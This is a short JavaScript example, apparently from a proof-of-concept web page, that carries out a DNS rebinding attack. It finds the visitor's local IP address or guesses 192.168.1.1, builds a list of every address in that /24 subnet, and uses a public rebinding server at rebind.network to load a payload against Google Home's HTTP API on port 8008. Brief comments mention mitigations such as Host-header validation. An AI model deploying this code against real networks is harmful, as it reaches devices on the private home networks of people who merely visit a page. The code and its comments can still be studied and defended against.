DNS Rebinding Example Code
// JS in index.html
//
// Entry point: ask the DNSRebindAttack library (not shown here) for the
// browser's local IP address, then hand it to launchRebindAttack().
//
// Defensive note: the address lookup is only a convenience. When it fails,
// the page falls back to guessing a common home subnet, so blocking the
// WebRTC address leak in the browser does not stop this flow by itself.
const fallBackToCommonSubnet = (err) => {
  console.error(err);
  // The WebRTC-based lookup did not produce an address; assume the
  // widely used 192.168.1.x home network instead.
  launchRebindAttack('192.168.1.1');
};

DNSRebindAttack.getLocalIPAddress()
  .then((ip) => launchRebindAttack(ip))
  .catch(fallBackToCommonSubnet);
/**
 * Builds the list of every address in the /24 that contains `localIp` and
 * passes it to the DNSRebindAttack library (defined elsewhere).
 *
 * Defensive note: this flow targets an HTTP service reachable on the LAN.
 * Services that validate the HTTP Host header or require authentication,
 * and resolvers that refuse private-range answers for public names, are
 * the usual mitigations for DNS rebinding.
 *
 * @param {string} localIp - dotted IPv4 address, e.g. '192.168.1.1'
 */
function launchRebindAttack(localIp) {
  // Keep everything before the last dot: '192.168.1.1' -> '192.168.1'.
  const lastDot = localIp.lastIndexOf('.');
  const subnetPrefix = localIp.substring(0, lastDot);

  // Expand to 256 addresses, '<prefix>.0' through '<prefix>.255'.
  const ips = Array.from(
    { length: 256 },
    (_, hostOctet) => `${subnetPrefix}.${hostOctet}`,
  );

  // First argument: domain name of a publicly accessible whonow server
  // (https://github.com/brannondorsey/whonow); the author states one runs
  // on port 53 of rebind.network.
  // Second argument: 8008, the port the author identifies as Google Home's
  // undocumented HTTP API server.
  const rebind = new DNSRebindAttack('rebind.network', 8008);

  // The author describes this call as spawning one iframe per target
  // (stated as 255; the list built above holds 256 entries). The meaning
  // of the remaining arguments is defined by the library, which is not
  // shown here.
  rebind.attack(ips, '127.0.0.1', 'payload/google-home.html');
}